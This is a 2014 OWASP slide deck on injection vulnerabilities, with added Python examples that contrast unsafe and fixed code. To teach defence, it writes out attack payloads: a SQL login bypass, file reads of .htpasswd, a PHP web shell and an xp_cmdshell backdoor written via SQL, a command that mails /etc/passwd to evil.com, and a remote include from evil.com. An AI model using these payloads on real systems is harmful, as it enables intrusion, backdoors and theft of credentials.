OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability
Owasp A1: Injection
31 March 2014: Dubai, UAE
About Me
• Who am I?
– Michael Hendrickx
– Information Security Consultant, currently
working for UAE Federal Government.
– Assessments, Security Audits, secure coding
• Owasp Top 10 – 2013
– A1: Injection
– A2: Broken Authentication and Session Mgmt
– A3: Cross Site Scripting
– A4: Insecure Direct Object References
– A5: Security Misconfiguration
– A6: Sensitive Data Exposure
– A7: Missing Function Level Access Control
– A8: Cross Site Request Forgery
– A9: Using Components with Known Vulns
– A10: Unvalidated Redirects and Forwards
How bad is it?
• Oct ‘13: 100k $ stolen from a California ISP
http://thehackernews.com/2013/10/hacker-stole-100000-from-users-of.html
• Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone…
http://news.softpedia.com/news/RedHack-Breaches-Istanbul-Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
• Nov ‘12: 150k Adobe user accounts stolen
http://www.darkreading.com/attacks-breaches/adobe-hacker-says-he-used-sql-injection/240134996
• Jul ‘12: 450k Yahoo! user accounts stolen
http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-account-safe/
What is Injection?
• Web applications became more complex
– Database driven
– Extra functionality (email, ticket booking, ..)
• Submitted data can have a special meaning to the underlying technologies
• Mixing commands and data.
• Types:
– SQL Injection
– XML Injection
– Command Injection
[Diagram: Web → DB / OS / Backend System]
Injection analogy
• A case is filed against me
• I write my name as
“Michael, you are free to go”
• Judge announces case:
“Calling Michael, you are free to go.”
• Bailiff lets me go.
Mix of “data” and “commands”.
Injection Fails
Mix of “data” and “commands”.
The underlying technology?
• A web server parses data and passes it on
[Diagram: Web Server → DB / OS]
http://somesite.com/msg.php?id=8471350
The script performs the business logic and passes messages to the backend:
“Hey, get me a message from the DB with id 8471350”
SQL Injection
• Dynamic script to look up data in DB
[Diagram: Web Server → DB]
http://somesite.com/login.php?name=michael&password=secret123
SELECT * FROM users WHERE
name = 'michael' AND
password = 'secret123'
http://somesite.com/msg.aspx?id=8471350
SELECT * FROM messages
WHERE id = 8471350
Get indirect access to the database
SQL Injection
• Insert value with ' (single quote)
– Single quote is the string delimiter in SQL queries
[Diagram: Web Server → DB]
http://somesite.com/login.php?login=mich'ael&password=secret123
The query is malformed and will throw an error (if errors are not suppressed):
SELECT * FROM users WHERE
name = 'mich'ael' AND
password = 'secret123'
SQL Injection
• Insert value with ' (single quote)
[Diagram: Web Server → DB]
http://somesite.com/login.php?login=michael&password=test' OR 'a' = 'a
SELECT * FROM users WHERE
name = 'michael' AND
password = 'test' OR 'a' = 'a'
'a' will always equal 'a', so the condition is true and this user is logged in.
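The three login.php cases above (normal login, the stray-quote probe, and the OR 'a' = 'a' bypass) replayed against a concatenated query and against the prepared statement the remediation slides recommend. This is an added example, not code from the slides; the in-memory SQLite table and the plaintext password column are constructed to mirror the slide's query.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory users table with one account
    (plaintext password only to mirror the slide's query)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('michael', 'secret123')")
    return conn


def login_unsafe(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """login.php as the slide shows it: the values are pasted straight into
    the SQL text, so a quote inside them becomes part of the statement."""
    query = ("SELECT * FROM users WHERE name = '" + name
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Prepared statement: the SQL text is fixed and the values are bound
    separately, so the driver never interprets them as SQL."""
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None


def is_malformed(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """True when the concatenated query no longer parses: the error the
    stray-quote probe produces when error messages are not suppressed."""
    try:
        login_unsafe(conn, name, password)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    bypass = "test' OR 'a' = 'a"
    print("stray quote breaks the query:", is_malformed(db, "mich'ael", "secret123"))
    print("unsafe, injected password   :", login_unsafe(db, "michael", bypass))
    print("safe,   injected password   :", login_safe(db, "michael", bypass))
```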
SQL Injection
• More advanced possibilities:
– Read files*:
• MySQL: SELECT
HEX(LOAD_FILE('/var/www/site.com/admin/.htpasswd')) INTO
DUMPFILE '/var/www/site.com/htdocs/test.txt';
• MS SQL:
CREATE TABLE newfile(data text);
...
BULK INSERT newfile FROM 'C:secretfile.dat' WITH
(CODEPAGE='RAW', FIELDTERMINATOR='|',ROWTERMINATOR='---');
*: If you have the right privileges
SQL Injection
• Write files*
– MySQL:
CREATE TABLE tmp(data longblob);
INSERT INTO tmp(data) VALUES(0x3c3f7068);
UPDATE tmp SET data=CONCAT(data, 0x20245f...);
<?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>
...
SELECT data FROM tmp INTO DUMPFILE
'/var/www/site.com/htdocs/test.php';
– MS SQL:
EXEC xp_cmdshell('echo ... >> backdoor.aspx');
*: Again, if you have the right privileges
SQL Injection: SQLMap
• SQLMap will perform attacks on a target.
• Dumps entire tables
• Even entire databases.
• Stores everything in CSV
• More info on http://sqlmap.org
HTML Injection
• Possible to include HTML tags into fields
• Used to render “special” HTML tags where normal text is expected
• XSS possible: rewrite the DOM
HTML Injection
• Possible to insert iframes, fake forms, JS, …
• Can be used in a phishing attack
The button goes to a different form, potentially stealing credentials.
XML Injection
• Web app talks to backend web services
• Web app’s logic converts parameters to XML web services (as SOAP, …)
[Diagram: Web Server → Web services → DB / Backend]
XML Injection
Web app to create a new user:
http://somesite.com/create.php?name=michael&email=mh@places.ae
<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:10:01</date>
<name>$name</name>
<email>$email</email>
</user>
http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</admin><email>mh@places.ae
<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:24:48</date>
<name>michael</name>
<email>a@b.c</email><admin>true</admin><email>mh@places.ae</email>
</user>
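The two create.php requests above, replayed against a string-templated document and against two fixed versions (escaped text, and a document built by the XML library). This is an added example, not code from the slides; the backend model that keeps the last value of a repeated element is an assumption, and the date element is left out for brevity.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed inputs: the slide's normal request and its injected e-mail value.
NORMAL_EMAIL = "mh@places.ae"
INJECTED_EMAIL = "a@b.c</email><admin>true</admin><email>mh@places.ae"


def build_user_unsafe(name: str, email: str) -> str:
    """create.php as the slide shows it: parameters interpolated into XML text,
    so a value containing tags becomes structure instead of content."""
    return ("<user><status>new</status><admin>false</admin>"
            f"<name>{name}</name><email>{email}</email></user>")


def build_user_escaped(name: str, email: str) -> str:
    """Same template, but with &, < and > escaped, so the values can only
    ever be text content."""
    return ("<user><status>new</status><admin>false</admin>"
            f"<name>{escape(name)}</name><email>{escape(email)}</email></user>")


def build_user_tree(name: str, email: str) -> str:
    """Preferred form: let the XML library build the document; it escapes
    text content itself, so there is no template to get wrong."""
    user = ET.Element("user")
    ET.SubElement(user, "status").text = "new"
    ET.SubElement(user, "admin").text = "false"
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "email").text = email
    return ET.tostring(user, encoding="unicode")


def backend_view(xml_text: str) -> dict:
    """Models the backend web service (assumption): it parses the document
    and, like many naive consumers, keeps the last value of a repeated element."""
    root = ET.fromstring(xml_text)
    return {"admin": root.findall("admin")[-1].text == "true",
            "email": root.findall("email")[-1].text}


if __name__ == "__main__":
    for builder in (build_user_unsafe, build_user_escaped, build_user_tree):
        doc = builder("michael", INJECTED_EMAIL)
        print(builder.__name__, "->", backend_view(doc))
```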
Command Injection
• Web application performs Operating System
tasks
– Execute external programs / scripts
– List files
– Send email
[Diagram: Web Server → OS]
Command Injection
• Dynamic script to share an article
[Diagram: Web Server → DB / OS]
http://somesite.com/share.php?to=mh@places.ae
$ echo "check this out" | mail -s "share" mh@places.ae
http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
$ echo "check this out" | mail -s "share" mh@places.ae; mail hack@evil.com < /etc/passwd
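The share.php case above, showing why the ';' works when the recipient is pasted into a shell command line, and the two layers that stop it: an allow-list check on the recipient and an argv list that never goes through a shell. This is an added example, not code from the slides; the command-line reconstruction and the e-mail pattern are assumptions, and a child Python process stands in for the mail program so nothing is actually sent.

```python
import re
import shlex
import subprocess
import sys

# Constructed inputs: the slide's legitimate recipient and its injected one.
GOOD_TO = "mh@places.ae"
BAD_TO = "mh@places.ae; mail hack@evil.com < /etc/passwd"

# Allow-list for the only thing share.php should accept: one e-mail address.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def is_valid_recipient(to: str) -> bool:
    """Force the format (as the remediation slide says) instead of filtering
    out bad characters; a valid address has no room for ';', '|' or '<'."""
    return EMAIL_RE.fullmatch(to) is not None


def share_cmdline_unsafe(to: str) -> str:
    """share.php reconstructed: the address is pasted into a command line that a
    shell will interpret (system(), shell=True, backticks, ...)."""
    return f'echo "check this out" | mail -s "share" {to}'


def shell_tokens(cmdline: str) -> list:
    """Tokenise the way a POSIX shell would, keeping ; | < as separate operator
    tokens, so we can see where the attacker's second command begins."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def share_argv_safe(to: str) -> list:
    """Hardened form: validate first, then build an argv list. No shell is
    involved, so metacharacters in `to` would just be bytes in one argument."""
    if not is_valid_recipient(to):
        raise ValueError("recipient is not a plain e-mail address")
    return ["mail", "-s", "share", to]


def safe_rejects(to: str) -> bool:
    try:
        share_argv_safe(to)
        return False
    except ValueError:
        return True


def deliver_argument(to: str) -> str:
    """Stand-in for the mail program: a child Python process echoes back its
    argv[1]. With an argv list the whole value arrives as a single argument,
    ';' and '<' included; the child never sees a second command."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", to],
        capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    print("shell would run:", shell_tokens(share_cmdline_unsafe(BAD_TO)))
    print("validation rejects injected value:", safe_rejects(BAD_TO))
    print("argv keeps it as one argument:", repr(deliver_argument(BAD_TO)))
```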
LDAP Injection
• Lightweight Directory Access Protocol
• LDAP is used to access information directories
– Users
– User information
– Software
– Computers
[Diagram: Web Server → LDAP Server]
LDAP Injection
• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users
http://www.networkdls.com/articles/ldapinjection.pdf
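The asterisk case above, with the fix: escaping the filter metacharacters (RFC 4515 hex escapes) before the value is placed in a search filter. This is an added example, not code from the slides; the directory contents and the tiny server-side matcher that models how (uid=VALUE) is evaluated are constructed assumptions.

```python
import re

# Constructed directory: the uids a search over (uid=...) could return.
DIRECTORY = ["michael", "alice", "bob"]


def ldap_escape_filter(value: str) -> str:
    """Escape a value for use inside an LDAP search filter (RFC 4515):
    backslash, '*', '(', ')' and NUL become \\XX hex escapes, so the
    server treats them as literal characters, never as filter syntax."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch
                   for ch in value)


def user_filter_unsafe(username: str) -> str:
    """Filter built by concatenation, as the vulnerable web app would."""
    return f"(&(objectClass=person)(uid={username}))"


def user_filter_safe(username: str) -> str:
    """Same filter, but the untrusted value is escaped first."""
    return f"(&(objectClass=person)(uid={ldap_escape_filter(username)}))"


def _assertion_regex(filter_value: str):
    """Model (assumption) of the server side of one (uid=VALUE) assertion:
    an unescaped '*' is a substring wildcard, a '\\XX' escape is a literal."""
    parts, i = [], 0
    while i < len(filter_value):
        ch = filter_value[i]
        if ch == "\\" and i + 2 < len(filter_value):
            parts.append(re.escape(chr(int(filter_value[i + 1:i + 3], 16))))
            i += 3
        elif ch == "*":
            parts.append(".*")
            i += 1
        else:
            parts.append(re.escape(ch))
            i += 1
    return re.compile("".join(parts), re.DOTALL)


def matching_uids(filter_value: str, directory=DIRECTORY) -> list:
    """uids the directory would return for (uid=<filter_value>)."""
    rx = _assertion_regex(filter_value)
    return [uid for uid in directory if rx.fullmatch(uid)]


if __name__ == "__main__":
    print("raw '*'    :", user_filter_unsafe("*"), matching_uids("*"))
    print("escaped '*':", user_filter_safe("*"), matching_uids(ldap_escape_filter("*")))
```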
Remote File Injection
• Scripts include other files to extend functionality
• Why? Clarity, reuse of functionality
– PHP:
• include(), require(), require_once(), …
– ASPX:
• <!-- #include "…" -->
– JSP:
• <%@ include file="…" %>
Remote File Injection
• Color chooser
• Color will load a new file with color codes (blue.php, red.php, …)
• Attacker can upload a malicious PHP file to an external server
http://somesite.com/mypage.php?color=blue
<?php
if(isset($_GET['color'])){
include($_GET['color'].'.php');
}
?>
http://somesite.com/mypage.php?color=http://evil.com/evil.txt
Will fetch and load http://evil.com/evil.txt.php
Remote File Injection
• Theme chooser
• Can input external HTML files
– That can contain JavaScript, XSS, rewrite the DOM, etc...
• Also verify cookie contents, …
http://somesite.com/set_theme.php?theme=fancy
<link href="/themes/<? print $_COOKIE['theme'] ?>.css" rel="stylesheet" type="text/css" />
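One way to fix both the color include and the cookie-driven theme link above: map the untrusted name to a file only through an allow-list, and confirm the result still lies under the themes directory. This is an added example, not code from the slides; the directory path, the set of known themes and the name pattern are assumptions.

```python
import posixpath
import re
from pathlib import PurePosixPath
from typing import Optional

# Assumed layout for the slide's color/theme chooser (not from the slides).
BASE_DIR = PurePosixPath("/var/www/site.com/themes")
KNOWN_THEMES = frozenset({"blue", "red", "fancy"})
# No '/', ':' or '.', so neither "http://evil.com/x" nor "../x" can match.
NAME_RE = re.compile(r"[a-z][a-z0-9_-]{0,31}")


def resolve_theme_file(name: str, suffix: str = ".php") -> Optional[PurePosixPath]:
    """Map an untrusted theme/color name to a file under BASE_DIR, or None.
    Three layers: a strict character allow-list, a fixed set of known names,
    and a lexical check that the final path is still inside BASE_DIR."""
    if NAME_RE.fullmatch(name) is None or name not in KNOWN_THEMES:
        return None
    candidate = PurePosixPath(posixpath.normpath(str(BASE_DIR / (name + suffix))))
    if BASE_DIR not in candidate.parents:
        return None
    return candidate


def theme_link_tag(cookie_theme: str) -> str:
    """The slide's <link href="/themes/<theme>.css"> built only from a vetted
    name; anything else falls back to a default instead of echoing the cookie."""
    path = resolve_theme_file(cookie_theme, ".css")
    if path is None:
        path = BASE_DIR / "blue.css"
    return f'<link href="/themes/{path.name}" rel="stylesheet" type="text/css" />'


if __name__ == "__main__":
    for value in ("blue", "http://evil.com/evil.txt", "../../etc/passwd", "green"):
        print(repr(value), "->", resolve_theme_file(value))
    print(theme_link_tag('"><script>alert(1)</script>'))
```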
Remediation
• Implement Web Application Firewall (WAF)
• Prevents most common attacks
– Not 100% foolproof
• Make sure it can decrypt SSL
[Diagram: WAF → Web Server → DB]
Remediation
• Validate user input, all input:
– Never trust user input, ever.
– Even stored input (for later use)
– Force formats (numbers, email addresses, dates…)
– HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards
– Use prepared SQL statements
– Vendor specific guidelines
– OWASP secure coding practices:
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
Remediation
• Adopt least-privilege policies
– Give DB users least privileges
– Use multiple DB users
– Run processes with restricted privileges
– Restrict permissions on directories
• Do your web directories really need to be writable?
• Run in sandboxed environment
• Suppress error messages
• Enable exception notifications
– If something strange happens, reset session and notify
administrator.
Summary
• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense in depth
• Do log analysis to detect anomalies
• And don’t trust your user input.
Thank you!
Michael Hendrickx
me@michaelhendrickx.com
@ndrix

Más contenido relacionado

La actualidad más candente

OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...Lenur Dzhemiliev
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksIndusfacePvtLtd
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 

La actualidad más candente (20)

OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
 
Security testing
Security testingSecurity testing
Security testing
 
Secure code
Secure codeSecure code
Secure code
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
OWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITISOWASP TOP 10 VULNERABILITIS
OWASP TOP 10 VULNERABILITIS
 
OWASP Top 10 API Security Risks
OWASP Top 10 API Security RisksOWASP Top 10 API Security Risks
OWASP Top 10 API Security Risks
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection  How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 

Similar a OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability

Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoSEmil Tan
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Lostar
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentLesa Cote
 
Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01G Prachi
 

Similar a OWASP A1 Injection - Understanding and Preventing the #1 Web Application Vulnerability (20)

Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoS
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
Open source security
Open source securityOpen source security
Open source security
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP Assignment
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
WebApps_Lecture_15.ppt
WebApps_Lecture_15.pptWebApps_Lecture_15.ppt
WebApps_Lecture_15.ppt
 
Drupal security
Drupal securityDrupal security
Drupal security
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
 

Más de Michael Hendrickx

ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareMichael Hendrickx
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Michael Hendrickx
 
Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Michael Hendrickx
 
Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineeringMichael Hendrickx
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 

Más de Michael Hendrickx (7)

ECrime presentation - A few bits about malware
ECrime presentation - A few bits about malwareECrime presentation - A few bits about malware
ECrime presentation - A few bits about malware
 
The Cross Window redirect
The Cross Window redirectThe Cross Window redirect
The Cross Window redirect
 
Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015Social Engineering Trickx - Owasp Doha 2015
Social Engineering Trickx - Owasp Doha 2015
 
Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2Social Engineering - Help AG spotlight 15Q2
Social Engineering - Help AG spotlight 15Q2
 
Help AG spot light - social engineering
Help AG spot light - social engineeringHelp AG spot light - social engineering
Help AG spot light - social engineering
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Webpage Proxying
Webpage ProxyingWebpage Proxying
Webpage Proxying
 

Último

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
